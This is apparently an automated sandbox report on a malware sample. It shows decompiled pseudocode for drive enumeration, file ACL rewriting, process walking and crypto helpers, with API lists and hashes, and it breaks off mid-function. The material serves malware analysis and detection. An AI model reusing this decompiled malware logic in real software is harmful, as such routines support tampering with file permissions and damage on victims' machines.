                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: time$Time$BeginPeriodSleep
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4118631919-0
                                                                                                                                                            • Opcode ID: 69aa7864394fc499a80eba6f4c33b6be63ce374a33522e33c2aa4e4f6cf6ffea
                                                                                                                                                            • Instruction ID: dff80598bacc0f0d717cbbd4714b2667290b4475da70542b8e37d039a362fc1c
                                                                                                                                                            • Opcode Fuzzy Hash: 69aa7864394fc499a80eba6f4c33b6be63ce374a33522e33c2aa4e4f6cf6ffea
                                                                                                                                                            • Instruction Fuzzy Hash: E2C012334EA061AFD3103720FF0D7D93B559B00352F414252F666C60B28A610CC0AAE1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4C0D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C4C0D(signed int* _a4) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				short _v20;
				union _ULARGE_INTEGER _v28;
				intOrPtr _t23;
				int _t31;
				short _t34;
				long _t40;
				void* _t41;
				short _t42;
				void* _t45;
				signed int _t46;
				void* _t47;
				union _ULARGE_INTEGER* _t49;
				signed int _t50;

				_t46 = 0;
				_t50 = 0;
				_v8 = 0;
				_t41 = 0;
				_t47 = 0x5a;
				L1:
				while(1) {
					if(_t41 == 0) {
						L5:
						_t42 =  *0x9cd178; // 0x3a0041
						_t23 =  *0x9cd17c; // 0x5c
						_v20 = _t42;
						_v16 = _t23;
						if(_t42 > _t47) {
							L14:
							_t46 = _v8;
							_t41 = _t41 + 1;
							if(_t41 > 1) {
								L17:
								return _t46;
							}
							continue;
						}
						_t6 = _t46 + 0xe; // 0xe
						_t49 = _t6 + _t50 * 0x16;
						do {
							_t31 = GetDriveTypeW( &_v20); // executed
							_v12 = _t31;
							if(E009C78B6(_t31) != 0) {
								if(_t41 != 0) {
									 *((short*)(_t49 - 0xe)) = _v20;
									 *(_t49 - 0xc) = _v12;
									_t13 = _t49 - 8; // 0x6
									_t40 = GetDiskFreeSpaceExW( &_v20,  &_v28, _t13, _t49); // executed
									if(_t40 == 0) {
										_t49->LowPart = _t40;
										_t49->LowPart.HighPart = _t40;
										 *(_t49 - 8) = _t40;
										 *(_t49 - 4) = _t40;
									}
								}
								_t50 = _t50 + 1;
								_t49 = _t49 + 0x16;
							}
							_t34 = _v20 + 1;
							_t45 = 0x5a;
							_v20 = _t34;
						} while (_t34 <= _t45);
						_t47 = _t45;
						goto L14;
					}
					if(_t50 == 0) {
						L16:
						 *_a4 =  *_a4 & 0x00000000;
						goto L17;
					}
					_t46 = E009C47AB(_t50 * 0x16);
					_v8 = _t46;
					if(_t46 == 0) {
						goto L16;
					}
					 *_a4 = _t50;
					_t50 = 0;
					goto L5;
				}
			}



















                                                                                                                                                            0x009c4c16
                                                                                                                                                            0x009c4c18
                                                                                                                                                            0x009c4c1c
                                                                                                                                                            0x009c4c1f
                                                                                                                                                            0x009c4c21
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4c22
                                                                                                                                                            0x009c4c24
                                                                                                                                                            0x009c4c4c
                                                                                                                                                            0x009c4c4c
                                                                                                                                                            0x009c4c52
                                                                                                                                                            0x009c4c57
                                                                                                                                                            0x009c4c5a
                                                                                                                                                            0x009c4c60
                                                                                                                                                            0x009c4cce
                                                                                                                                                            0x009c4cce
                                                                                                                                                            0x009c4cd1
                                                                                                                                                            0x009c4cd5
                                                                                                                                                            0x009c4ce4
                                                                                                                                                            0x009c4cea
                                                                                                                                                            0x009c4cea
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4cd7
                                                                                                                                                            0x009c4c65
                                                                                                                                                            0x009c4c68
                                                                                                                                                            0x009c4c6a
                                                                                                                                                            0x009c4c6e
                                                                                                                                                            0x009c4c75
                                                                                                                                                            0x009c4c80
                                                                                                                                                            0x009c4c84
                                                                                                                                                            0x009c4c8a
                                                                                                                                                            0x009c4c91
                                                                                                                                                            0x009c4c94
                                                                                                                                                            0x009c4ca1
                                                                                                                                                            0x009c4ca9
                                                                                                                                                            0x009c4cab
                                                                                                                                                            0x009c4cad
                                                                                                                                                            0x009c4cb0
                                                                                                                                                            0x009c4cb3
                                                                                                                                                            0x009c4cb3
                                                                                                                                                            0x009c4ca9
                                                                                                                                                            0x009c4cb6
                                                                                                                                                            0x009c4cb7
                                                                                                                                                            0x009c4cb7
                                                                                                                                                            0x009c4cc0
                                                                                                                                                            0x009c4cc2
                                                                                                                                                            0x009c4cc3
                                                                                                                                                            0x009c4cc7
                                                                                                                                                            0x009c4ccd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4ccd
                                                                                                                                                            0x009c4c28
                                                                                                                                                            0x009c4cdc
                                                                                                                                                            0x009c4cdf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4cdf
                                                                                                                                                            0x009c4c37
                                                                                                                                                            0x009c4c39
                                                                                                                                                            0x009c4c3f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4c48
                                                                                                                                                            0x009c4c4a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4c4a

                                                                                                                                                            APIs
                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,0000000A,00000000,009D0270,?,?,?,?,009C1A35,?), ref: 009C4C6E
                                                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,00000006,0000000E,?,?,?,?,009C1A35,?), ref: 009C4CA1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DiskDriveFreeSpaceType
                                                                                                                                                            • String ID: A:\
                                                                                                                                                            • API String ID: 1419299958-3379428675
                                                                                                                                                            • Opcode ID: ae7cc7bdd94eb12da1cdaddc3ec69d341b71c5aba54098bd21d88d7a0c1e3d7a
                                                                                                                                                            • Instruction ID: 3e9b8b85d4bc015671b272a2f919577192cfc8fabe529194bf161be5468b5a88
                                                                                                                                                            • Opcode Fuzzy Hash: ae7cc7bdd94eb12da1cdaddc3ec69d341b71c5aba54098bd21d88d7a0c1e3d7a
                                                                                                                                                            • Instruction Fuzzy Hash: 4A218F76E452169BD714DFA9C890FEFF7BCFB84710B14822AE944D7250E73089418B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4A20, Relevance: 4.6, APIs: 3, Instructions: 71memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                            			E009C4A20(void* __ecx, intOrPtr _a4) {
				short _v8;
				struct _SID_IDENTIFIER_AUTHORITY _v12;
				void* _t8;
				signed int _t11;
				signed int _t13;
				void* _t16;
				void* _t21;
				signed int _t22;
				void* _t25;
				int _t31;

				_v8 = 0x100;
				_v12.Value = 0;
				_t31 =  *0x9d1d58; // 0x501
				if(_t31 != 0) {
					L5:
					_t8 =  *0x9d10b4(_a4, 1, 4, 0, 0,  *0x9d1d2c, 0); // executed
					_t21 = _t8;
					if(_t21 != 0) {
						_t11 = (0 | _t21 == 0x00000005) - 1;
					} else {
						_t11 = 1;
					}
					L8:
					return _t11;
				}
				_t13 = AllocateAndInitializeSid( &_v12, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0x9d1d28);
				if(_t13 != 0) {
					_t22 = 8;
					memset(0x9d1d5c, 0, _t22 << 2);
					_t16 =  *0x9d1d28; // 0xb70f78
					 *0x9d1d5c = 0x10000000;
					 *0x9d1d60 = 2;
					 *0x9d1d64 = 3;
					 *0x9d1d70 = 0;
					 *0x9d1d74 = 5;
					 *0x9d1d78 = _t16;
					_t13 =  *0x9d1014(1, 0x9d1d5c, 0, 0x9d1d2c, _t25);
					if(_t13 != 0) {
						goto L2;
					}
					 *0x9d1d58 = 1;
					goto L5;
				}
				L2:
				_t11 = _t13 | 0xffffffff;
				goto L8;
			}













                                                                                                                                                            0x009c4a28
                                                                                                                                                            0x009c4a2e
                                                                                                                                                            0x009c4a31
                                                                                                                                                            0x009c4a37
                                                                                                                                                            0x009c4ac7
                                                                                                                                                            0x009c4ad7
                                                                                                                                                            0x009c4add
                                                                                                                                                            0x009c4ae3
                                                                                                                                                            0x009c4aee
                                                                                                                                                            0x009c4ae5
                                                                                                                                                            0x009c4ae5
                                                                                                                                                            0x009c4ae5
                                                                                                                                                            0x009c4aef
                                                                                                                                                            0x009c4af3
                                                                                                                                                            0x009c4af3
                                                                                                                                                            0x009c4a50
                                                                                                                                                            0x009c4a58
                                                                                                                                                            0x009c4a65
                                                                                                                                                            0x009c4a75
                                                                                                                                                            0x009c4a77
                                                                                                                                                            0x009c4a7f
                                                                                                                                                            0x009c4a89
                                                                                                                                                            0x009c4a93
                                                                                                                                                            0x009c4a9d
                                                                                                                                                            0x009c4aa3
                                                                                                                                                            0x009c4aad
                                                                                                                                                            0x009c4ab2
                                                                                                                                                            0x009c4abb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4abd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4abd
                                                                                                                                                            0x009c4a5a
                                                                                                                                                            0x009c4a5a
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,009D1D28,?,?,?,?,009C561A), ref: 009C4A50
                                                                                                                                                            • SetEntriesInAclW.ADVAPI32(00000001,009D1D5C,00000000,009D1D2C,?,?,?,?,?,009C561A,?,?,?,009C2D35,?,00000001), ref: 009C4AB2
                                                                                                                                                            • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,?,?,?,?,009C561A,?,?,?,009C2D35,?), ref: 009C4AD7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateEntriesInfoInitializeNamedSecurity
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2342141041-0
                                                                                                                                                            • Opcode ID: 9cfd97282db3f1089257be270856369000253a4f40fca233c764cbc92cd38e5d
                                                                                                                                                            • Instruction ID: dfbce4274974ad2c75c1445d382393dcf0744e64796a3394283844a7bae40cc7
                                                                                                                                                            • Opcode Fuzzy Hash: 9cfd97282db3f1089257be270856369000253a4f40fca233c764cbc92cd38e5d
                                                                                                                                                            • Instruction Fuzzy Hash: F81190B67E9208BFFB108F61EC95F6637AEE744398F10412EF111861E0D7B148C09711
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C53A4, Relevance: 4.5, APIs: 3, Instructions: 46processCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                            			E009C53A4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v560;
				void* _t8;
				struct tagPROCESSENTRY32W* _t9;
				int _t19;
				void* _t20;

				_t19 = 0;
				_t8 = CreateToolhelp32Snapshot(2, 0); // executed
				_t20 = _t8;
				if(_t20 != 0xffffffff) {
					_t9 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t20, _t9); // executed
					while(_t9 != 0) {
						_t19 = _a12(_a8,  &_v560);
						if(_t19 == 0 || _a4 == 0) {
							_t9 = Process32NextW(_t20,  &_v560); // executed
							continue;
						} else {
							break;
						}
					}
					E009C4B21(_t20); // executed
					return _t19;
				}
				return 0;
			}








                                                                                                                                                            0x009c53af
                                                                                                                                                            0x009c53b4
                                                                                                                                                            0x009c53ba
                                                                                                                                                            0x009c53bf
                                                                                                                                                            0x009c53c5
                                                                                                                                                            0x009c53cb
                                                                                                                                                            0x009c53d7
                                                                                                                                                            0x009c5408
                                                                                                                                                            0x009c53ec
                                                                                                                                                            0x009c53f2
                                                                                                                                                            0x009c5402
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c53f2
                                                                                                                                                            0x009c540d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5413
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C53B4
                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 009C53D7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2353314856-0
                                                                                                                                                            • Opcode ID: 72a6e523ee2fa3263271bac63f297177a3a6acf825335e8e41fd4a79b1d9b9a9
                                                                                                                                                            • Instruction ID: 15c45af6d24a095b95e61fa98fc9a525bec73baeecbf691308931b8e8835f7cb
                                                                                                                                                            • Opcode Fuzzy Hash: 72a6e523ee2fa3263271bac63f297177a3a6acf825335e8e41fd4a79b1d9b9a9
                                                                                                                                                            • Instruction Fuzzy Hash: CE01A232909518BBD7206A75BC0CFAF7B6CEB89361F21416AFC19C2190D7749DC58AA2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C5CDE, Relevance: 3.0, APIs: 2, Instructions: 49encryptionCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 009C5CF7
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 009C5D1E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BinaryCryptHeapString$CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 869147093-0
                                                                                                                                                            • Opcode ID: 9508a4ce3bfddbed687139be54a7accd15eaac9eed1496f5e575ba9e90e5e4e3
                                                                                                                                                            • Instruction ID: b4d56481985c872d3168e0132bfb72ad9b44c81f0526f6897ae15f8c961bb314
                                                                                                                                                            • Opcode Fuzzy Hash: 9508a4ce3bfddbed687139be54a7accd15eaac9eed1496f5e575ba9e90e5e4e3
                                                                                                                                                            • Instruction Fuzzy Hash: E8F0AF7260121D7FEB101F55DCC4EAB7BADEF047E8B01842AFA0ADA150D731DD8086A1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C541B, Relevance: 3.0, APIs: 2, Instructions: 46encryptionCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                            			E009C541B(void* __edx, int _a4, intOrPtr _a8) {
				BYTE* _v0;
				void* _t7;
				signed int _t11;
				void* _t14;

				_t7 = E009C5814(_a4, _a8); // executed
				if(_t7 == 0) {
					if(E009C548C(__edx, _a4, _a8) != 0) {
						goto L1;
					} else {
						_pop(_t21);
						if( *0x9d1d38 != 0) {
							L8:
							_t11 = CryptGenRandom( *0x9d1d34, _a4, _v0);
							asm("sbb eax, eax");
							return  ~( ~_t11);
						} else {
							_t14 =  *0x9d11e8(0x9d1d34, 0, 0, 1, 0xf0000000);
							if(_t14 != 0) {
								 *0x9d1d38 = 1;
								goto L8;
							} else {
								return _t14;
							}
						}
					}
				} else {
					L1:
					return 1;
				}
			}







                                                                                                                                                            0x009c5424
                                                                                                                                                            0x009c542d
                                                                                                                                                            0x009c5443
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5445
                                                                                                                                                            0x009c5445
                                                                                                                                                            0x009c564b
                                                                                                                                                            0x009c5673
                                                                                                                                                            0x009c567f
                                                                                                                                                            0x009c5687
                                                                                                                                                            0x009c568c
                                                                                                                                                            0x009c564d
                                                                                                                                                            0x009c565d
                                                                                                                                                            0x009c5665
                                                                                                                                                            0x009c5669
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5668
                                                                                                                                                            0x009c5668
                                                                                                                                                            0x009c5668
                                                                                                                                                            0x009c5665
                                                                                                                                                            0x009c564b
                                                                                                                                                            0x009c542f
                                                                                                                                                            0x009c542f
                                                                                                                                                            0x009c5433
                                                                                                                                                            0x009c5433

                                                                                                                                                            APIs
                                                                                                                                                            • CryptAcquireContextW.ADVAPI32(009D1D34,00000000,00000000,00000001,F0000000,?,009C6A64,?,00000030,00000000,?,?,009C67D8,?,00000020,00000000), ref: 009C565D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AcquireContextCrypt
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3951991833-0
                                                                                                                                                            • Opcode ID: e11bfe32ba6b504ff5926baed87e6aa0a9fc893134d6e5186f3c0c76718ce5ad
                                                                                                                                                            • Instruction ID: d4d68438651aa2037dddc8ed18dabe503893e51de2b0523f4dee12403403f939
                                                                                                                                                            • Opcode Fuzzy Hash: e11bfe32ba6b504ff5926baed87e6aa0a9fc893134d6e5186f3c0c76718ce5ad
                                                                                                                                                            • Instruction Fuzzy Hash: D4F06833699609BEDF101FE0EC45F653B9A9B40765F60801AF609C84F1D772A5D0A645
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C5D3F, Relevance: 3.0, APIs: 2, Instructions: 44encryptionCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,009C18E3), ref: 009C5D60
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,009C18E3), ref: 009C5D89
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BinaryCryptHeapString$CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 869147093-0
                                                                                                                                                            • Opcode ID: 26f8ea8d4f909bb067d37838669806623bd099b633c8a61cd6113b044881a323
                                                                                                                                                            • Instruction ID: 5120476218be0501d887e36db29e6e5b788d1db10ff48fa30f9fd33cbab55599
                                                                                                                                                            • Opcode Fuzzy Hash: 26f8ea8d4f909bb067d37838669806623bd099b633c8a61cd6113b044881a323
                                                                                                                                                            • Instruction Fuzzy Hash: 49F04F33A006597BDB11AEA5DC08F9B3BADEF817A1F01402AF909C6150DB30D95087A1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C47AB, Relevance: 3.0, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C47AB(intOrPtr _a4) {
				void* _t3;

				if( *0x9d1d24 != 0) {
					_t2 =  *0x9d1d20; // 0x2a40000
				} else {
					_t2 = HeapCreate(0, 0x400000, 0); // executed
					 *0x9d1d20 = _t2;
					if(_t2 == 0) {
						 *0x9d1d20 = GetProcessHeap();
					}
					 *0x9d1d24 = 1;
				}
				_t3 = E009C474E(_t2, _a4); // executed
				return _t3;
			}




                                                                                                                                                            0x009c47b5
                                                                                                                                                            0x009c47e6
                                                                                                                                                            0x009c47b7
                                                                                                                                                            0x009c47c0
                                                                                                                                                            0x009c47c6
                                                                                                                                                            0x009c47cd
                                                                                                                                                            0x009c47d5
                                                                                                                                                            0x009c47d5
                                                                                                                                                            0x009c47da
                                                                                                                                                            0x009c47da
                                                                                                                                                            0x009c47ef
                                                                                                                                                            0x009c47f7

                                                                                                                                                            APIs
                                                                                                                                                            • HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                            • GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1042935442-0
                                                                                                                                                            • Opcode ID: 36d02a45e6861caf1b6aa045144615d315a988437f84389098a4df2c31145eb5
                                                                                                                                                            • Instruction ID: 681259254e3560684f3456a847b5f042a886eda417aae24f40041bc4c7724e3b
                                                                                                                                                            • Opcode Fuzzy Hash: 36d02a45e6861caf1b6aa045144615d315a988437f84389098a4df2c31145eb5
                                                                                                                                                            • Instruction Fuzzy Hash: C7E01276A9E308BFD7109F90EC15F543BD9B709794F10001BE514961E0D77594C0AA19
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009CB82A, Relevance: 2.3, Strings: 1, Instructions: 1025COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                            			E009CB82A(void* __ecx, void* __eflags, void* _a4, signed char _a7, signed char* _a8, signed char _a11, signed int _a12, signed int _a15) {
				signed char _v5;
				signed int _v12;
				intOrPtr* _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed long long _v48;
				signed int _v52;
				signed char* _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				signed char* _v76;
				char _v80;
				intOrPtr _v92;
				signed char _v100;
				void _v104;
				intOrPtr _v108;
				void* _v112;
				char _v116;
				signed int _t387;
				void* _t390;
				void* _t394;
				void* _t396;
				char _t397;
				void* _t399;
				void* _t400;
				void* _t401;
				void* _t402;
				intOrPtr _t405;
				intOrPtr _t410;
				intOrPtr _t411;
				void* _t419;
				void* _t424;
				void* _t431;
				void* _t440;
				void* _t447;
				void* _t452;
				signed char _t453;
				signed int _t454;
				void* _t456;
				void* _t457;
				void* _t458;
				signed char _t460;
				void* _t462;
				void* _t469;
				void* _t472;
				void* _t473;
				void* _t474;
				void* _t476;
				signed char _t481;
				signed int _t482;
				signed char _t483;
				signed char _t484;
				signed char _t519;
				signed int _t520;
				signed char _t521;
				void* _t527;
				void* _t528;
				void* _t529;
				void* _t531;
				void* _t533;
				signed int _t540;
				void* _t546;
				intOrPtr _t549;
				signed int _t554;
				void* _t561;
				intOrPtr _t562;
				signed char* _t567;
				char _t568;
				signed char* _t569;
				signed char* _t570;
				signed char* _t571;
				signed char* _t572;
				signed char* _t573;
				signed char* _t574;
				signed char* _t575;
				signed char* _t576;
